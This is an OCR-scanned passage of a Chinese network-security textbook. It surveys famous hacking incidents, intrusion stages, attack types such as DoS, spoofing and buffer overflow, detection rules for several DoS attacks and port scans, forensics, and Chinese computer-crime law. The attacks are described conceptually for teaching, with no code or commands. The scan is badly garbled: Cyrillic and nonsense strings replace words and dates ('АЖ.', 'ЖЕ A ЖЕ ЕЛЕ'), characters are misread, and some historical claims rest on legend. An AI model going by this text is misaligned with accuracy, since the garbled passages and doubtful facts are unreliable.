如 维护 和 管理 相关 的 黑客 论坛 .新闻 组 以 及 邮件 列表 ,维持 大 的 软件 供应 站 点 ,推动 КЕС 
和 其 他 技术 标准 等 。 

(5) 真正 的 黑客 不 会 随意 破解 商业 软件 并 将 其 广泛 流传 ,也 不 会 恶意 侵入 别人 的 网 
站 并 造成 损失 ,黑客 的 所 作 所 为 应 当 更 像 是 对 于 网 络 安 全 的 监督 。 
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1.1.2.3 黑客 事件 

历史 上 ,发 生 过 许多 著名 的 黑客 人 侵 事件 : 

1979 年 ,年 仅 15 岁 的 凯 文 。 米 特 尼 克 仅 赁 一 台 计 算 机 和 一 部 调制 解 调 器 冯 人 了 北 
美空 中 防务 指挥 部 的 计算 机 主机 。 

1987 4E , 美 联 邦 执法 部 门 指控 16 岁 的 赫 尔 伯 特 。 齐 恩 冯 和 美国 电话 电报 公司 的 内 
部 网 络 和 中 心 交 换 系 统 。 齐 恩 是 美国 1986 年 “计算 机 欺诈 与 滥用 法 案 ” 生 效 后 被 判 有 罪 
的 第 一 人 。 

1988 年 ,年 仅 23 岁 的 大 学 生 Robert Morris 在 Internet 上 释放 了 世界 上 首 个 “蠕虫 ” 
程序 。Robert Morris 最 初 是 把 这 个 99 行 的 程序 放 在 互联 网 上 进行 试验 ,可 结果 却 使 得 
他 的 计算 机 被 感染 并 迅速 在 互联 网 上 草 延 开 。Robert Morris 也 因此 在 1990 年 被 判 
АЖ. 

1990 年 ,为 了 获得 在 洛杉矶 地 区 kiis-fm 电台 第 102 个 呼 人 者 的 奖励 一 一 保时捷 跑 
车 ,Kevin Poulsen 控制 了 整个 地 区 的 电话 系统 ,以 确保 他 是 第 102 个 呼 入 者 。 最 终 ,他 如 
愿 以 偿 获 得 跑车 并 为 此 和 人 狱 三 年 。 

1995 年 ,来自 俄罗斯 的 黑客 Vladimir Levin 成 为 历史 上 第 一 个 通过 入 侵 银 行 计 算 机 
系统 来 获 利 的 黑客 ,他 侵入 美国 花旗 银行 并 盗 走 1000 万 美金 。 

1996 年 ,美国 黑客 Timothy Lloyd 曾 将 一 个 六 行 的 恶意 软件 放 在 了 其 雇主 Omega 
工程 公司 (美国 航天 航空 局 和 美国 海军 最 大 的 供 货 商 ) 的 网 络 上 ,此 事件 导致 Omega 公司 
损失 1000 万 美金 。 

1999 年 ,年 仅 30 岁 的 David Smith 编写 了 Melissa 病毒 。 它 是 世界 上 首 个 具有 全 球 
破坏 力 的 病毒 , 它 使 世界 上 300 多 家 公司 的 计算 机 系统 崩溃 。 整 个 病毒 造成 的 损失 接近 
4 亿美 金 。David Smith 随后 被 判处 5 年 徒刑 。 

2000 年 ,年 仅 15 岁 的 MafiaBoy( 由 于 年 龄 太 小 ,因此 没有 公布 其 真实 身份 ) 在 情人 节 
期 间 成 功 侵入 包括 eBay, Amazon 和 Yahoo 在 内 的 大 型 网 站 服务 器 ,并 成 功 阻 止 了 服务 
ЖЕ A ЖЕ ЕЛЕ. f F 2000 年 被 捕 。 

2002 年 11 月 ,伦敦 人 Gary McKinnon 在 英国 被 指控 非法 侵入 美国 军 方 90 多 个 计算 
机 系统 。 

1994 #4 H 20 日, 中国 NCFC 工程 通过 美国 Sprint 公司 连 入 Internet 的 64kbps ЕЁ 
际 专 线 开通 ,实现 了 与 Internet 的 全 功能 连接 ,中 国 成 为 直接 接 入 Internet 的 国家 。 从 
此 ,中 国 黑客 开始 了 原始 萌动 。 同 年 ,中 国 第 一 部 信息 安全 法 规 ( 中 华人 民 共 和 国 计 算 机 
信息 系统 安全 保护 条 例 ) 颁 布 实施 。1997 年 《中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联网 
管理 暂行 规定 ) 颁 布 实施 。 

1998 年 6 H 16 日 ,上 海 某 信息 网 的 工作 人 员 在 例 行 检 查 时 ,发 现 网 络 唱 到 不 速 之 客 
的 袭击 。7 月 13 日 ,犯罪 嫌疑 人 杨 某 被 逮捕 。 这 是 我 国 第 一 例 计 算 机 黑客 事件 。 

1999 年 ,中 国 黑客 发 展 的 历史 上 产生 了 一 个 高 峰 。 这 一 年 正 是 网 络 泡沫 高 度 泛滥 的 
顶峰 ,黑客 在 这 一 阵势 不 可 挡 的 浪潮 中 不 可 避免 地 泛 起 了 泡沫 。 从 1999 年 到 2000 年 ,中 
国 黑客 联盟 .中 国 鹰 派 .中 国 红 客 联盟 等 一 大 批 黑客 网 站 兴起 , 带 来 了 黑客 普及 教育 。 
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1.1.2.4 黑客 人 侵 技 术 

黑客 人 侵 一 般 分 为 信息 收集 .探测 分 析 系 统 安全 弱点 以 及 实施 攻击 三 个 步骤 。 

信息 收集 是 为 了 了 解 所 要 攻击 目标 的 详细 信息 ,通常 黑客 会 利用 相关 的 网 络 协议 或 
实用 程序 来 收集 ,常用 的 工具 主要 包括 以 下 几 种 。 

* SNMP 协议 : 用 来 查阅 网 络 系统 路 由 器 的 路 由 表 , 从 而 了 解 目 标 主机 所 在 网 络 的 

拓扑 结构 及 其 内 部 细节 。 

* TraceRoute 程序 : 用 来 获得 到 达 目 标 主机 所 要 经 过 的 网 络 数 和 路 由 器 数 。 

* Whois 协议 : 该 协议 的 服务 信息 能 提供 所 有 有 关 的 DNS 域 和 相关 的 管理 参数 。 
DNS 服务 器 : 用 来 提供 系统 中 可 访问 的 主机 的 IP 地 址 表 和 它们 所 对 应 的 主 
机 名 。 

。 Finger 协议 : 用 来 获取 一 个 指定 主机 上 的 所 有 用 户 的 详细 信息 。 
Ping 实用 程序 : 用 来 确定 一 个 指定 的 主机 的 位 置 。 

首先 , 当 收 集 到 目标 相关 信息 以 后 ,黑客 会 利用 探测 分 析 系 统 寻 找 系统 的 安全 漏洞 或 
设计 缺陷 。 黑 客 发 现 “ 补 丁 ” 程 序 的 接口 后 会 自己 编写 程序 ,通过 该 接口 进入 目标 系统 。 
黑客 还 会 使 用 Telnet FTP 等 软件 向 目标 主机 申请 服务 ,如 果 目 标 主 机 有 应 答 就 说 明 其 
开放 了 这 些 端口 的 服务 。 其 次 ,黑客 使 用 一 些 公开 的 工具 软件 ,如 Internet 安全 扫描 程序 
(Internet security scanner, ISS) 网络 安全 分 析 工 具 SATAN 等 来 对 网 络 进行 扫描 ,确定 
安全 漏洞 或 使 用 特洛伊 木马 来 获取 攻击 目标 系统 的 非法 访问 权 。 

在 获得 目标 系统 的 非法 访问 权限 后 ,黑客 会 实施 攻击 ,攻击 可 分 为 以 下 两 种 。 

。 被 动 攻击 : 攻击 者 只 观察 和 分 析 某 一 个 协议 数据 单元 (PDU) 而 不 干扰 信息 流 。 

例如 ,监听 截获 操作 等 。 

。 主动 攻击 : 攻击 者 对 某 个 连接 中 通过 的 数据 包 进 行 各 种 处 理 。 例 如 ,更 改 报 文 

流 .拒绝 报 文 服 务 .伪造 连接 初始 化 等 。 

攻击 程度 包括 以 下 等 级 : 

。 只 获得 访问 权 ( 登 录 名 和 口令 )。 

。 获得 访问 权 , 并 毁坏 .侵蚀 或 改变 数据 。 

。 获得 访问 权 , 并 获得 部 分 系统 或 整个 系统 控制 权 ,拒绝 拥有 特权 用 户 的 访问 。 

。 未 获得 访问 权 ,通过 攻击 程序 引起 网 络 持久 性 或 暂时 性 的 运行 失败 .重新 启动 E 

起 或 其 他 无 法 操作 的 状态 。 

1. 黑客 攻击 过 程 

黑客 攻击 过 程 包括 以 下 步 又 : 

C) 隐藏 自己 的 踪迹 。 通 过 清除 日 志 、 删 除 拷贝 文件 .进程 隐藏 .连接 隐藏 .使 日 志 闲 
乱 等 方法 销毁 和 人 侵 痕迹 ,并 在 受 攻击 目标 系统 中 为 自己 建立 新 的 后 门 , 以 便 继续 访问 该 
系统 。 

(2) 在 目标 系统 内 安装 探测 软件 ,如 特洛伊 木马 或 其 他 一 些 远 程控 制程 序 ,继续 收集 
感 兴趣 的 信息 和 敏感 数据 。 黑 客 还 可 以 以 目标 系统 为 跳板 向 其 他 系统 发 起 攻击 。 

G) 在 被 攻击 目标 系统 上 进一步 获得 特许 访问 权 ,开展 对 整个 系统 的 攻击 ,毁坏 重要 
数据 乃至 破坏 整个 网 络 系统 。 
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2. 主要 入 侵 方式 


1) 密码 破解 
。 字典 攻击 : 一 种 被 动 攻击 ,黑客 获取 系统 的 口令 ,然后 利用 字典 进行 匹配 比较 。 
字典 攻击 成 功率 较 高 。 


。 伪造 登录 程序 : 通过 伪造 登录 界面 来 获得 用 户 输入 的 账号 和 密码 。 
。 密码 探测 程序 : 反复 模拟 NT 的 编码 过 程 ,并 与 Windows NT 系统 的 SAM 密码 
数据 库 内 的 数据 进行 匹配 。 
。 口令 攻击 : 通过 网 络 监听 非法 得 到 用 户口 令 , 然 后 利用 软件 强行 破解 用 户口 令 ; 
获得 用 户口 令 文件 后 暴力 破解 用 户口 令 。 
。 口令 陷阱 : 在 网 络 服务 中 设置 虚假 界面 ,要 求 用 户 输入 用 户 名 与 口令 ,从 而 截获 
该 用 户 的 用 户 名 与 口令 。 
。 网 络 踩点 : 利用 工具 获取 目标 的 一 些 有 用 信息 ,如 域名 、IP 地 址 、 网 络 拓扑 结构 及 
相关 用 户 信息 。 
。 协议 栈 指 纹 : 利用 探测 包 , 从 得 到 的 响应 中 确定 目标 主机 使 用 的 操作 系统 。 
。 会 话 劫持 : 在 合法 的 通信 连接 建立 后 ,可 通过 阻塞 或 挫 毁 通信 的 一 方 来 接管 已 经 
建立 起 来 的 连接 ,从 而 假冒 被 接管 方 与 对 方 通信 。 
非 授 权 访 问 尝试 : 对 被 保护 文件 进行 读 、 写 或 执行 的 尝试 ,也 包括 为 获得 被 保护 
访问 权限 所 做 的 尝试 。 
2) 网 络 监 听 
网 络 监听 又 称 为 IP 嗅 探 ,是 主机 的 一 种 工作 模式 。 在 这 种 模式 下 ,主机 可 以 接收 到 
本 网 段 在 同一 条 物理 通道 上 传输 的 所 有 信息 。 高 级 的 窃听 程序 具有 生成 假 数 据 包 、 解 码 
等 功能 ,甚至 可 锁定 服务 器 的 特定 端口 ,自动 处 理 与 这 些 端口 有 关 的 数据 包 。 利 用 上 述 功 
能 ,可 监听 他 人 的 联网 操作 ,窃取 信息 。 
当 信息 以 明文 的 形式 在 网 络 上 传输 时 , 便 可 以 使 用 网 络 监 听 的 方式 进行 攻击 。 将 网 
络 接口 设置 在 监听 模式 便 可 以 源源 不 断 地 将 网 上 的 信息 截获 。 网 络 监听 可 以 获取 网 络 中 
所 有 的 数据 包 。 
3) 系统 漏洞 与 欺骗 
。 漏洞 是 指 系 统 本 身 的 设计 、 操 作 和 实现 上 的 错误 ,这 些 漏洞 在 补丁 未 被 开发 出 来 
之 前 一 般 很 难 防御 黑客 的 破坏 。 
。 欺骗 式 主动 式 攻击 ,利用 网 络 上 的 某 台 计算 机 来 伪装 另 一 台 目 标 主机 ,以 此 欺骗 
网 络 中 的 其 他 计算 机 向 伪造 计算 机 发 送 数据 或 赋予 权限 。 常 见 的 欺骗 方式 包括 
IP 欺骗 .路 由 欺骗 .ARP 欺骗 以 及 Web 欺骗 。 
4) 端口 扫描 与 特洛伊 木马 
在 连续 的 非 授 权 访 问 过 程 中 ,攻击 者 为 了 获得 网 络 内 部 的 信息 ,通常 使 用 这 种 攻击 尝 
试 ,典型 示例 包括 SATAN 扫描 、 端 口 扫描 和 IP 半途 扫描 等 。 
黑客 可 以 利用 一 些 端口 扫描 软件 ,如 ЅАТАМ ІР Hacker 等 对 被 攻击 目标 进行 端口 
扫描 ,查看 是 否 存在 开放 端口 并 进行 通信 操作 。 扫 描 器 是 自动 监测 远程 或 本 地 主机 安全 
性 弱点 的 程序 。 通 过 使 用 扫描 器 可 以 不 留 痕 迹地 发 现 远 程 服务 器 的 各 种 ТСР 端口 的 分 
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配 、 提 供 的 服务 和 软件 版 本 ,从 而 了 解 到 远程 主机 所 存在 的 安全 问题 。 

特洛伊 木马 是 一 种 基于 远程 控制 的 黑客 工具 。 木 马 程序 寄生 在 普通 程序 内 部 暗中 进 
行 某 些 破坏 性 操作 或 进行 数据 窃取 ,以 完成 某 些 特殊 任务 。 

不 能 自我 复制 是 特洛伊 木马 与 病毒 的 最 显著 的 区 别 。 特 洛 伊 木马 原则 上 只 是 一 种 远 
程 管理 工具 ,而 且 本 身 不 带 伤害 性 ,也 没有 感染 力 ,所 以 不 能 称 之 为 病毒 ,但 却 常 常 被 视 为 
病毒 。 目 前 的 杀毒 软件 对 木马 有 一 定 的 预防 和 清除 作用 。 

5) 拒绝 服务 (denial of service. DoS) Mi 

最 基本 的 拒绝 服务 攻击 方式 就 是 利用 合理 的 服务 请 求 来 占用 过 多 的 服务 资源 ,从 而 
使 合法 用 户 无 法 得 到 服务 。 目 前 已 知 的 拒绝 服务 攻击 就 有 几 百 种 , 它 是 最 基本 的 人 侵 攻 
击 手段 ,也 是 最 难 对 付 的 入 侵 攻 击 手段 之 一 。DoS 攻击 分 为 四 种 : 

* 利用 TCP/IP 协议 中 的 Bug 进行 攻击 ,如 Ping of Death 和 Teardrop. 

。 利 用 TCP/IP 协议 的 脆弱 性 进行 攻击 ,如 SYN Flood fil Land 攻击 。 

* 用 大 量 无 用 数据 淹没 一 个 网 络 , 如 Smurf 攻击 和 Fraggle 攻击 。 

。 分 布 式 拒绝 服务 攻击 (DDoS)。 

6) WWW 欺骗 技术 

将 用 户 浏览 网 页 的 URL 指向 黑客 设 定 的 服务 器 , 当 用 户 浏览 目标 网 页 的 时 候 , 实 际 
上 是 向 黑客 服务 器 发 出 请 求 , 达 到 欺骗 的 目的 。 

7) 电子 邮件 攻击 

电子 邮件 攻击 主要 表现 为 两 种 方式 。 

。 电子 邮件 龙 炸 : 向 同一 信箱 发 送 数 以 千 计 、 万 计 其 至 无 穷 多 次 的 内 容 相 同 的 垃 

邮件 ,致使 电子 邮件 服务 器 操作 系统 瘫痪 。 

。 电子 邮件 欺骗 : 在 正常 的 附件 中 加 载 病毒 或 其 他 木马 程序 。 

8) 缓冲 区 溢出 

缓冲 区 溢出 是 一 种 系统 攻击 手段 ,通过 向 程序 的 缓冲 区 写 入 超出 其 长 度 的 内 容 , 造 成 
缓冲 区 的 溢出 ,从 而 破坏 程序 的 堆栈 ,使 程序 转 而 执行 其 他 指令 ,以 达到 攻击 的 目的 。 据 
统计 ,通过 缓冲 区 溢出 进行 的 攻击 占 所 有 系统 攻击 总 数 的 80% 以 上 。 一般 情 况 下 ,覆盖 
其 他 数据 区 的 数据 是 没有 意义 的 ,最 多 造成 应 用 程序 错误 。 但 是 ,如 果 输 入 的 数据 是 经 过 
精心 设计 的 ,覆盖 缓冲 区 的 数据 恰恰 是 入 侵 程 序 代 码 , 入 侵 者 就 获取 了 程序 的 控制 权 。 

此 外 ,入 侵 方式 还 包括 社会 工程 学 攻击 、 黑 客 软件 攻击 以 及 跳板 攻击 等 。 

3. 主要 防范 措施 

可 采取 的 防范 黑客 人 侵 的 措施 主要 包括 数据 加 密 、 身 份 认证 完善 访问 控制 策略 、 审 
计 等 。 

。 身份 认证 是 指 通 过 密码 或 特征 信息 来 确认 用 户 身份 的 真实 性 ,对 重要 主机 单独 设 
立 一 个 网 段 , 以 避免 机 器 被 攻破 后 造成 整个 网 段 通信 全 部 暴露 。 
完善 访问 控制 策略 ,设置 访问 权限 、 目 录 安 全 等 级 控制 ,防火墙 安 全 控制 等 ,研究 
清楚 各 进程 必需 的 进程 端口 号 ,关闭 不 必要 的 端口 。 

。 审计 是 指 把 系统 中 和 安全 相关 的 事件 全 部 记录 下 来 ,对 用 户 开 放 的 各 个 主机 的 日 

志文 件 全 部 定向 并 集中 管理 ,定期 检查 备份 日 志 主 机 上 的 数据 、 系 统 日 志文 件 和 
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关键 配置 文件 。 

。 下 载 安装 最 新 的 操作 系统 及 其 他 应 用 软件 的 安全 和 升级 补丁 ,安装 几 种 必要 的 安 
全 加 强 工具 ,对 系统 进行 完整 性 检查 。 

。 制定 详尽 的 入 侵 应 急 措施 以 及 汇报 制度 。 发 现 人 侵 迹 象 ,立即 打开 进程 记录 功 
能 ,同时 保存 内 存 中 的 进程 列表 以 及 网 络 连接 状态 ,保护 当前 的 重要 日 志文 件 。 


1.1.2.5 人 侵 检测 技术 

入 侵 检 测 技术 的 核心 问题 是 截获 有 效 的 网 络 信息 。 目 前 主要 是 通过 两 种 途径 来 获取 
信息 : 

。 通过 网 络 侦 听 程序 (如 Sniffer, Vpacket 等 ) 来 获取 网 络 信息 (数据 包 信 息 、 网 络 流 

量 信 息 、 网 络 状态 信息 、 网 络 管理 信息 等 ) 。 
* 通过 对 操作 系统 和 应 用 程序 的 系统 日 志 进行 分 析 , 来 发 现 人 侵 行为 和 系统 潜在 的 
安全 漏洞 。 

入 侵 检测 的 基本 手段 是 采用 模式 匹配 的 方法 来 发 现 人 侵 攻 击 行为 ,典型 的 入 侵 检测 
方式 包括 以 下 内 容 : 

1) Land 攻击 

Land 攻击 是 一 种 拒绝 服务 攻击 。 由 于 Land 攻击 的 数据 包 中 的 源 地 址 和 目标 地 址 
是 相同 的 ,因此 当 操 作 系 统 接 收 到 这 类 数据 包 时 ,不 知道 该 如 何 处 理 堆栈 中 通信 源 地 址 和 
目的 地 址 相同 的 这 种 情况 ,或 者 循环 发 送 和 接收 该 数据 包 , 消 耗 大 量 的 系统 资源 ,从 而 造 
成 系统 崩溃 或 死机 。 

检测 方法 : 判断 网 络 数据 包 的 源 地 址 和 目标 地 址 是 否 相 同 。 配 置 防火 墙 或 过 滤 路 由 
器 的 过 滤 规 则 ,并 对 这 种 攻击 进行 审计 ,记录 事件 发 生 的 时 间 、 源 主机 和 目标 主机 的 
MAC 地 址 和 TP 地 址 。 

2) TCP SYN 攻击 

TCP SYN 攻击 是 一 种 拒绝 服务 攻击 。 利 用 TCP 客户 机 与 服务 器 之 间 三 次 握手 过 
程 的 缺陷 来 进行 。 攻 击 者 通过 伪造 源 IP 地 址 向 被 攻击 者 发 送 大 量 的 SYN 数据 包 , 当 被 
攻击 主机 接收 到 大 量 的 SYN 数据 包 时 ,需要 使 用 大 量 的 缓存 来 处 理 这 些 连接 ,并 将 SYN 
ACK 数据 包 发 送 回 错误 的 IP 地 址 ,并 一 直 等 待 ACK 数据 包 的 回应 ,最 终 导致 缓存 用 完 ， 
不 能 再 处 理 其 他 合法 的 SYN 连接 ,对 外 提供 正常 服务 。 

检测 方法 : 检查 单位 时 间 内 收 到 的 SYN 连接 是 否 超过 系统 设 定 的 值 。 当 接收 到 大 
量 的 SYN 数据 包 时 ,通知 防火 墙 阻 断 连接 请 求 或 丢弃 这 些 数据 包 , 并 进行 系统 审计 。 

3) Ping Of Death 攻击 

Ping Of Death 攻击 是 一 种 拒绝 服务 攻击 。 由 于 部 分 操作 系统 接收 到 长 度 大 于 
65535 字 节 的 数据 包 时 ,会 造成 内 存 溢出 、 系 统 崩 浊 等 后 果 , 从 而 达到 攻击 的 目的 。 

检测 方法 : 判断 数据 包 的 大 小 是 否 大 于 65535 个 字 节 。 使 用 补丁 程序 , 当 收 到 大 于 
65535 个 字 节 的 数据 包 时 ,丢弃 该 数据 包 , 并 进行 系统 审计 。 

4) WinNuke 攻击 

WinNuke 攻击 是 一 种 拒绝 服务 攻击 。 特 征 是 攻击 目标 端口 ,被 攻击 的 目标 端口 通常 
是 139、138、137、113、53, 而 且 URG 位 设 为 “1”, 即 紧急 模式 。 
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检测 方法 : 判断 数据 包 目 标 端 口 是 否 为 139、138、137 等 ,并 判断 URG 位 是 否 为 “1”。 
配置 防火 墙 设备 或 过 滤 路 由 器 ,并 对 这 种 攻击 进行 审计 。 

5) Teardrop 攻击 

Teardrop 攻击 是 一 种 拒绝 服务 攻击 。 其 工作 原理 是 向 被 攻击 者 发 送 多 个 分 片 的 
IP 包 , 某 些 操 作 系统 收 到 含有 重 琶 偏 移 的 伪造 分 片 数据 包 时 将 会 出 现 系统 崩溃 、 重 启 等 
现象 。 

检测 方法 : 对 接收 到 的 分 片 数 据 包 进行 分 析 ,计算 数据 包 的 片 偏 移 量 (Offset) 是 否 有 
误 。 添 加 系统 补丁 程序 ,丢弃 收 到 的 病态 分 片 数 据 包 ,并 对 这 种 攻击 进行 审计 。 

6) TCP/UDP 端口 扫描 

TCP/UDP 端口 扫描 是 一 种 预 探 测 攻 击 。 对 被 攻击 主机 的 不 同 端口 发 送 ТСР 或 
UDP 连接 请 求 ,探测 被 攻击 对 象 运行 的 服务 类 型 。 

检测 方法 : 统计 外 界 对 系统 端口 的 连接 请 求 ,特别 是 对 21、23、25、53、80、8000、 
8080 等 以 外 的 非常 用 端口 的 连接 请 求 。 当 收 到 多 个 TCP/UDP 数据 包 对 异常 端口 的 连 
接 请 求 时 ,通知 防火 墙 阻 断 连接 请 求 ,并 对 攻击 者 的 IP 地址 和 MAC 地 址 进行 审计 。 

1.1.2.6 计算 机 取证 

计算 机 取证 又 称 为 数字 取证 或 电子 取证 ,是 指 对 计算 机 入侵、 破坏 .欺诈 攻击 等 犯罪 
行为 利用 计算 机 软 硬 件 技术 ,按照 符合 法 律 规范 的 方式 进行 证 据 获 取 、 保 存 . 分 析 和 出 示 
的 过 程 。 从 技术 上 看 ,计算 机 取证 是 一 个 对 受 侵 计 算 机 系统 进行 扫描 和 破解 ,以 及 对 整个 
入 侵 事件 进行 重建 的 过 程 。 计 算 机 取证 包括 以 下 两 个 阶段 。 

。 物理 证 据 获取 : 指 调查 人 员 到 计算 机 犯罪 或 入 侵 现场 ,寻找 并 扣留 相关 的 计算 机 

硬件 。 

。 信息 发 现 : 指 从 原始 数据 中 寻找 可 以 用 来 证 明 或 者 反驳 的 证 据 , 即 电子 证 据 。 

物理 取证 是 核心 任务 。 物 理 证 据 的 获取 是 全 部 取证 工作 的 基础 。 获 取 物 理 证 据 , 保 
证 原始 数据 不 受 任何 破坏 ,应 遵守 如 下 操作 规定 : 

。 不 改变 原始 记录 。 

* 不 在 作为 证 据 的 计算 机 上 执行 无 关 的 操作 。 

。 不 给 犯罪 者 销毁 证 据 的 机 会 。 

。 详细 记录 所 有 的 取证 活动 。 

。 受 善 保存 得 到 的 物证 。 

如 果 被 和信 侵 的 计算 机 处 于 工作 状态 ,取证 人 员 应 该 设法 保存 尽 可 能 多 的 犯罪 信息 。 

物理 取证 不 但 是 基础 ,而 且 是 技术 难点 。 案 件 发 生 后 ,应 立即 对 目标 机 和 网 络 设备 进 
行内 存 检查 并 做 好 记录 ,根据 所 用 操作 系统 的 不 同 可 以 使 用 内 存 检查 命令 对 内 存 里 易 删 
除数 据 进 行 保存 ,力求 不 要 对 硬盘 进行 任何 读 写 操作 ,以 免 更 改 数据 原始 性 。 利 用 专门 的 
工具 对 硬盘 进行 逐 扇 区 的 读 取 ,将 硬盘 数据 完整 地 复制 出 来 ,便于 对 原始 硬盘 的 镜像 文件 
进行 分 析 。 

在 道德 感化 .技术 防范 的 同时 ,无 疑 也 离 不 开 法 律 手段 的 辅助 作用 ,需要 依靠 一 定 刑 
罚 威慑 力 的 保障 。 美 国 是 世界 上 最 早 发 明 计算 机 的 国家 ,也 是 世界 上 最 早 对 计算 机 黑客 
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行为 进行 立法 规范 的 国家 。 从 某 种 意义 上 讲 , 美 国 反 计算 机 犯罪 的 立法 ,对 其 他 国家 开展 
相关 工作 提供 了 许多 可 资 借鉴 的 经 验 和 教训 。 其 中 ,最 著名 的 有 《1984 年 计算 机 欺诈 和 
滥用 法 》。 

在 我 国 ,1994 年 国务 院 颁布 的 (计算 机 信息 系统 安全 保护 条 例 ), 是 第 一 个 对 计算 机 
信息 系统 安全 进行 保护 的 条 例 。 该 条 例 没 有 规定 计算 机 犯罪 的 罪名 ,但 是 第 24 条 规定 ， 
对 于 违反 本 条 例 的 规定 构成 犯罪 的 ,依法 追究 刑事 责任 。 此 后 ,1996 年 国务 院 发 布 ( 计 算 
机 信息 网 络 国际 联网 管理 暂行 规定 》(1997 年 作 了 修正 );1997 年 公安 部 发 布 (计算 机 信息 
网 络 国际 联网 安全 保护 管理 办 法 》;1998 年 ,国务 院 信息 化 工作 领导 小 组 发 布 (计算 机 信 
息 网 络 国际 联网 管理 暂行 规定 实施 办 法 ); 国 家 保密 局 发 布 ( 计 算 机 信息 系统 保密 管理 暂 
行规 定 》; 公 安 部 .中 国人 民 银 行 发 布 ( 金 融 机 构 计算 机 信息 系统 安全 保护 工作 暂行 规定 》。 
这 一 系列 法 律 法 规 和 相关 规定 共同 构成 了 一 个 计算 机 信息 系统 和 网 络 安全 保护 的 初步 法 
律 框架 。 

随 着 计算 机 安全 与 犯罪 问题 日 益 严 重 , 公 安 部 授权 起 草 了 涉及 计算 机 安全 与 犯罪 问 
题 的 专门 性 法 条 ,在 1997 年 刑法 修订 中 ,增加 了 关于 计算 机 安全 与 犯罪 的 三 个 条 款 , 即 第 
285 条、 第 286 条 和 第 287 Ж. 1997 4E 12 月 9 日 最 高 人 民法 院 审 判 委 员 会 第 951 KAW 
通过 的 《关于 执行 (中 华人 民 共 和 国 刑法 ) 确 定罪 名 的 规定 》, 规 定 了 两 个 罪名 , 即 非法 侵入 
计算 机 信息 系统 罪 和 破坏 计算 机 信息 系统 罪 。2000 4E 12 月 28 日 , 九 届 全 国人 大 常委 会 
第 十 九 次 会 议 表决 通过 (全 国人 民 代 表 大 会 常务 委员 会 关于 维护 互联 网 安全 的 决定 ), 规 
定 对 于 侵入 国家 事务 .国防 事务 .尖端 科学 技术 领域 的 计算 机 信息 系统 的 行为 构成 犯罪 
的 ,依照 刑法 有 关 规 定 追 究 刑事 责任 。 这 进一步 强化 了 我 国 打击 计算 机 黑客 行为 的 法 律 
体系 。 


1.1.3 网 络 安全 主要 影响 因素 


网 络 安全 的 主要 影响 因素 包括 以 下 几 个 方面 : 

1) 系统 安全 漏洞 

常用 的 各 种 操作 系统 几乎 都 或 多 或 少 存在 安全 漏洞 。 系 统 漏 洞 分 为 两 种 : 有 意 漏洞 
和 无 意 漏洞 。 有 意 漏洞 是 软件 代码 编写 者 有 意 设置 的 ,目的 在 于 当 失 去 对 系统 的 访问 权 
时 , 仍 能 进入 系统 。 无 意 漏洞 是 指 在 编写 软件 代码 时 无 意 留 下 的 缺陷 或 不 足 。 

据 统计 ,目前 发 现 的 系统 安全 漏洞 的 数量 已 经 接近 病毒 的 数量 。 典 型 安全 漏洞 如 远 
程 获得 超级 用 户 root 权限 .远程 过 程 调用 (RPC) 服 务 以 及 它 所 安排 的 无 口令 入 口 。 

目前 流行 的 许多 操作 系统 均 存 在 网 络 安全 漏洞 ,如 UNIX 和 Windows。 黑 客 往往 就 
是 利用 这 些 操作 系统 本 身 所 存在 的 安全 漏洞 侵入 系统 ,具体 包括 以 下 几 个 方面 : (1) 稳 定 
性 和 可 扩充 性 方面 。 由 于 设计 的 系统 不 规范 .不 合理 以 及 缺乏 安全 性 考虑 ,因而 使 其 受到 
影响 。 网 络 应 用 的 需求 没有 引起 足够 的 重视 ,设计 和 选 型 考虑 欠 周 密 , 从 而 使 网 络 功能 发 
挥 受 阻 , 影 响 网 络 的 可 靠 性 .扩充 性 和 升级 换代 。(2) 网 卡 工作 站 选 配 不 当 , 导 致 网 络 不 稳 
定 ,缺乏 安全 策略 。 许 多 站 点 在 防火 墙 配置 上 无 意识 地 扩大 了 访问 权限 ,忽视 了 这 些 权限 
可 能 会 被 其 他 人 员 滥 用 ;此 外 ,访问 控制 配置 的 复杂 性 容易 导致 配置 错误 ,从 而 给 他 人 以 
可 乘 之 机 。 
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2) TCP/IP 协议 安全 

TCP/IP 协议 原理 公开 ,存在 很 大 的 安全 隐患 ,缺乏 强健 的 安全 机 制 。 当 安全 工具 发 
现 并 努力 更 正 某 方面 的 安全 问题 时 ,其 他 的 安全 问题 又 出 现 了 。 因 此 ,黑客 总 是 可 以 使 用 
先进 的 手段 进行 攻击 。 

3) 物理 安全 问题 

完整 准确 的 安全 评估 是 黑客 人 侵 防 范 体系 的 基础 。 它 可 以 对 现 有 或 将 要 构建 的 网 络 
安全 防护 性 能 作出 科学 .准确 的 分 析 评 估 。 网 络 安全 评估 分 析 就 是 对 网 络 进行 检查 ,确定 
是 否 存在 可 能 被 黑客 利用 的 漏洞 ,并 对 发 现 的 问题 提出 建议 ,从 而 提高 网 络 系统 安全 
性 能 。 

4) 人 为 因素 

人 为 因素 包括 人 为 的 无 意 失 误 .恶意 攻击 及 管理 缺失 ,来 自 内 部 用 户 的 安全 威胁 远大 
于 外 网 用 户 的 安全 威胁 。 使 用 者 缺乏 安全 意识 ,许多 应 用 服务 系统 在 访问 控制 及 安全 通 
信 方 面 考虑 较 少 , 如 果 系 统 设 置 错误 ,很 容易 造成 损失 。 


1.2 网 络 安全 基本 知识 


互联 网 为 人 们 提供 了 快速 ,便捷 的 通信 手段 ,促进 了 计算 机 网 络 技术 在 社会 .经 济 各 
领域 的 广泛 应 用 ,同时 也 为 伺机 窃取 利益 信息 的 不 法 之 徒 提 供 了 犯罪 场地 。 随 着 计算 机 
网 络 应 用 范围 的 不 断 扩 大 ,网 络 安全 问题 已 成 为 当今 社会 的 一 个 焦点 。 据 伦敦 英国 银行 
协会 统计 ,全球 每 年 因 计算 机 犯罪 造成 的 损失 大 约 为 80 亿美 元 。 而 计算 机 安全 专家 则 指 
出 ,实际 损失 金额 应 在 100 亿美 元 以 上 。 


1.2.1 网 络 安全 研究 内 容 


网 络 安全 包括 以 下 三 个 方面 的 内 容 : 
CD 计算 机 实体 的 安全 。 在 一 定 的 环境 下 ,对 网 络 系统 中 设备 的 安全 保护 。 
(2) 网 络 系统 运行 安全 。 在 实体 安全 前 提 下 ,保证 网 络 系统 不 受 偶然 的 或 恶意 的 威 
胁 , 能 够 连续 可 靠 地 运行 ,正常 的 网 络 服务 不 中 断 。 
(3) 信息 安全 。 在 网 络 内 存储 和 处 理 的 信息 资源 具有 绝对 的 保密 性 、 完 整 性 和 可 用 
